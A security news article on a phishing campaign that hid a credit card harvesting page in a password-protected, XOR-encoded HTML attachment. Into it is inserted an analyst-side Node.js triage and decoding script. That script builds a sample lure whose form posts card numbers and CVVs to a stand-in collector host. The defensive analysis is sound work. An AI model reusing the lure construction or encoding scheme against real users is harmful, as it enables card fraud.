
Phishing

Phishers Adopt Malware Distribution-Like Tactics

A recently detected phishing campaign designed to steal credit card information employed a series of attack tactics previously associated with malware distribution, Proofpoint security researchers reveal.


The technique involves the distribution of a malicious document inside a .zip archive that is password-protected. The archive is attached to an email and the password to open it is included in the email body. Most recently, the method was used to distribute the Cerber ransomware (the campaign also dropped the Ursnif banking Trojan).

Recently, phishers decided to adopt the technique and adapt it to their needs in an attempt to steal banking data. However, instead of an Office document, this attack uses an HTML attachment that has been password-protected.

As is typical, the email message is personalized with the recipient’s name, as well as with what supposedly represents the first digits of their credit card number. However, since those leading digits are the same for every card of a given brand, this apparent personalization is only meant to create a sense of legitimacy for the carefully crafted emails without requiring any knowledge of a potential victim’s card number.

Furthermore, the spam emails use stolen branding and social engineering tactics to create a sense of urgency and trick the user into giving away their credit card information: recipients are told they need to update their security information for their “new chip card.”

The HTML attachment used in this campaign was found to be XOR-encoded to make dynamic analysis more difficult. According to Proofpoint, the password protection is implemented in JavaScript: a script named pah.js decrypts the XOR-encoded HTML once the user enters the password.

As soon as the user enters the password provided in the email body and the HTML attachment is decrypted, a fairly typical credit card phishing template complete with stolen branding is displayed. As in credential phishing, the victim is asked to enter their details in the form, which submits them via HTTP POST.
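The following is an added analyst-side example, not Proofpoint’s code and not the campaign’s pah.js. It shows two things a mail-security or SOC team would want from the mechanism described above: static indicators that an HTML attachment is a password-gated XOR blob (so it can be routed to review without rendering it), and offline recovery of the inner page with the password taken from the email body, followed by extraction of the form’s POST target and the card fields it collects. The attachment layout (a hex blob in a data attribute), the field names and the sample content are assumptions; the attachment itself is constructed at runtime so no pre-made blob is shipped. Runs under Node.js with no dependencies.

```javascript
// Added triage example for a password-gated, XOR-encoded HTML attachment (Node.js,
// no dependencies). Not Proofpoint's code and not the campaign's pah.js: the blob
// layout, field names and sample content below are assumptions.

// Repeating-key XOR. It is symmetric: applying it twice with the same key restores
// the original bytes, so the lure's decoder doubles as the analyst's recovery tool.
function xorWithKey(bytes, key) {
  const keyBytes = Buffer.from(key, 'utf8');
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    out[i] = bytes[i] ^ keyBytes[i % keyBytes.length];
  }
  return out;
}

// Constructed sample (not a real attachment): the inner page mimics the kind of
// card-update form the article describes and is XOR-encoded here at runtime with a
// constructed password, exactly as an email-supplied password would gate it.
const SAMPLE_PASSWORD = '7h3-p4ss';
const SAMPLE_INNER_PAGE =
  '<html><body><h1>Update your chip card security information</h1>' +
  '<form method="POST" action="https://collector.example/submit.php">' +
  '<input name="cardnumber"><input name="expiry"><input name="cvv">' +
  '</form></body></html>';
const SAMPLE_BLOB = xorWithKey(Buffer.from(SAMPLE_INNER_PAGE, 'utf8'), SAMPLE_PASSWORD)
  .toString('hex');
const SAMPLE_ATTACHMENT =
  '<html><body><p>Enter the password from your email to view the document</p>' +
  '<input type="password" id="pw"><button onclick="open()">Open</button>' +
  '<script src="pah.js"></script>' +
  '<div id="payload" data-blob="' + SAMPLE_BLOB + '"></div></body></html>';

// Static indicators of the gating pattern. None is conclusive alone; two or more
// are a good reason to hold the attachment for sandbox or manual review.
function triageAttachment(html) {
  const indicators = {
    passwordPrompt: /<input[^>]*type=["']?password/i.test(html),
    largeHexBlob: /[0-9a-f]{256,}/i.test(html),
    decoderScript: /pah\.js|charCodeAt\s*\([^)]*\)\s*\^/i.test(html),
    writesDecodedHtml: /document\.write|innerHTML/i.test(html),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  return { indicators, score, suspicious: score >= 2 };
}

// Plausibility check for a decode attempt: a correct password yields printable text
// with recognisable tags, a wrong one yields junk. Lets the analyst spot a mistyped
// or stale password instead of staring at garbage.
const KNOWN_TAGS = /<\/?(html|head|body|form|input|script|div|span|p|a|img|table)[\s>\/]/gi;
function looksLikeHtml(text) {
  let printable = 0;
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i);
    if (c === 9 || c === 10 || c === 13 || (c >= 32 && c < 127)) printable++;
  }
  const tags = new Set([...text.matchAll(KNOWN_TAGS)].map((m) => m[1].toLowerCase()));
  return printable / Math.max(text.length, 1) > 0.95 && tags.size >= 2;
}

// Once decoded, the artefacts worth recording are the form's POST target (for
// blocklists and takedown) and the fields it collects (to confirm card harvesting).
function extractFormTargets(html) {
  const actions = [...html.matchAll(/<form[^>]*action=["']([^"']+)["']/gi)].map((m) => m[1]);
  const fields = [...html.matchAll(/<input[^>]*name=["']([^"']+)["']/gi)].map((m) => m[1]);
  const cardFields = fields.filter((f) => /card|cvv|cvc|expir|pan/i.test(f));
  return { actions, fields, cardFields, harvestsCardData: cardFields.length > 0 };
}

// Offline recovery: pull the blob out of the attachment and XOR it with the password
// from the email body, without ever rendering the page in a browser.
function recoverInnerPage(html, password) {
  const m = html.match(/[0-9a-f]{256,}/i);
  if (!m) return { ok: false, reason: 'no encoded blob found' };
  const decoded = xorWithKey(Buffer.from(m[0], 'hex'), password).toString('utf8');
  if (!looksLikeHtml(decoded)) {
    return { ok: false, reason: 'decoded output is not HTML (wrong password?)' };
  }
  return { ok: true, html: decoded, exfil: extractFormTargets(decoded) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageAttachment(SAMPLE_ATTACHMENT)));
  console.log(JSON.stringify(recoverInnerPage(SAMPLE_ATTACHMENT, SAMPLE_PASSWORD).exfil));
  console.log(JSON.stringify(recoverInnerPage(SAMPLE_ATTACHMENT, 'wrong-password')));
}
```

The triage step deliberately does not need the password: the combination of a password prompt, a large encoded blob and a decoder script is visible in the raw attachment, which is what a gateway rule or YARA-style check can key on. The recovery step is for the analyst who has the email and wants the POST target and field list for blocking and reporting.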

The use of a password-protected attachment is meant not only to make detection and analysis more difficult, but also to convince users that the email is legitimate. The fact that the password is included in the email body also adds to this sense of legitimacy, in addition to making it easy for the recipients to open the attachment.


“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” Proofpoint researchers note.

Related: Backdoored Phishing Templates Advertised on YouTube

Related: Cybercriminals Use New Tricks in Phishing Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
